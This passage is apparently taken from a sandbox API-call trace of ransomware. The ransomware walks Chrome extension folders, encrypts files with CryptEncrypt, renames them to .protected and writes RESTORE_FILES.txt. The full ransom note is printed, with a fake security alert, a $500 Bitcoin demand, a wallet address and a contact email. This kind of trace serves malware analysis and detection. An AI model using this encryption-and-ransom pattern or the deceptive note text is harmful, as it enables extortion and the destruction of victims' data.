pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.282] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.322] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json") returned 156 [0079.322] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.322] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json") returned 156 [0079.322] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.322] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json") returned 156 [0079.323] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.323] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xf3, lpOverlapped=0x0) returned 1 [0079.323] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff0d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.324] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xf3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xf3, lpOverlapped=0x0) returned 1 [0079.324] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.324] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.324] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.324] CloseHandle (hObject=0x168) returned 1 [0079.324] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json.protected") returned 166 [0079.324] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json.protected")) returned 1 [0079.325] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.325] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.325] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\RESTORE_FILES.txt") returned 160 [0079.325] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.326] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.326] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.327] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.327] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.327] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.327] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.327] CloseHandle (hObject=0x164) returned 1 [0079.327] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.327] lstrcmpiW (lpString1="fi", lpString2="Windows") returned -1 [0079.327] lstrcmpiW (lpString1="fi", lpString2="Program Files") returned -1 [0079.327] lstrcmpiW (lpString1="fi", lpString2="Program Files (x86)") returned -1 [0079.327] lstrcmpiW (lpString1="fi", lpString2="$Recycle.bin") returned 1 [0079.327] lstrcmpiW (lpString1="fi", lpString2="System Volume Information") returned -1 [0079.327] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi") returned 142 [0079.327] lstrcmpW (lpString1="fi", lpString2=".") returned 1 [0079.327] lstrcmpW (lpString1="fi", lpString2="..") returned 1 [0079.328] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\*") returned 144 [0079.328] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.328] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.328] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.328] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.328] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.328] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.328] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\.") returned 144 [0079.328] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.328] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.328] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.328] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.328] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.328] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.328] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.328] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\..") returned 145 [0079.328] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.328] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.328] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.328] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.328] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.328] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.328] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.328] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.328] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json") returned 156 [0079.328] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.329] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.329] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.329] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.329] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.329] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json") returned 156 [0079.329] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.329] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json") returned 156 [0079.329] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.329] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json") returned 156 [0079.329] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.329] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x101, lpOverlapped=0x0) returned 1 [0079.330] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffeff, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.330] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x101, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x101, lpOverlapped=0x0) returned 1 [0079.330] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.331] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.331] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.331] CloseHandle (hObject=0x168) returned 1 [0079.331] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json.protected") returned 166 [0079.331] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json.protected")) returned 1 [0079.332] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.332] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.332] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\RESTORE_FILES.txt") returned 160 [0079.332] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.332] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.332] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.333] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.333] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.333] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.333] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.333] CloseHandle (hObject=0x164) returned 1 [0079.334] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.334] lstrcmpiW (lpString1="fil", lpString2="Windows") returned -1 [0079.334] lstrcmpiW (lpString1="fil", lpString2="Program Files") returned -1 [0079.334] lstrcmpiW (lpString1="fil", lpString2="Program Files (x86)") returned -1 [0079.334] lstrcmpiW (lpString1="fil", lpString2="$Recycle.bin") returned 1 [0079.334] lstrcmpiW (lpString1="fil", lpString2="System Volume Information") returned -1 [0079.334] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil") returned 143 [0079.334] lstrcmpW (lpString1="fil", lpString2=".") returned 1 [0079.334] lstrcmpW (lpString1="fil", lpString2="..") returned 1 [0079.334] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\*") returned 145 [0079.334] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.334] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.334] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.334] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.334] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.334] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.334] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\.") returned 145 [0079.334] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.334] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.334] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.335] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.335] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.335] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.335] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.335] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\..") returned 146 [0079.335] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.335] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.335] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.335] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.335] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.335] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.335] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.335] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.335] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json") returned 157 [0079.335] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.335] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.335] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.335] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.335] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.336] lstrlenW 